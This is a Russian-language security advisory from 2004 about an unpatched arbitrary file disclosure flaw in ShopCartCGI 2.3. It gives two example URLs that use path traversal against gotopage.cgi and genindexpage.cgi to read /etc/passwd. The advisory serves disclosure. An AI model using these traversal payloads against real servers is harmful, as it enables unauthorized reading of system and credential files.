Просмотр произвольных файлов в ShopCartCGI

Дата публикации:
19.02.2004
Всего просмотров:
779
Опасность:
Средняя
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Раскрытие важных данных
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
ShopCartCGI 2.x
Уязвимые версии: ShopCartCGI 2.3

Описание: Уязвимость обнаружена в ShopCartCGI. Удаленный пользователь может просматривать файлы на системе с привилегиями целевого пользователя.

 
http://[target]/directory/gotopage.cgi?13686+/../../../../../../../../../../../../../../../../etc/passwd

h ttp://[target]/directory/genindexpage.cgi?13687+Home+/../../../../../../../../../../../../../../../../etc/passwd

URL производителя: http://www.ggmate.com/ShopCartCGISoftware/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: ShopCartCGI v2.3 Remote arbitrary

или введите имя

CAPTCHA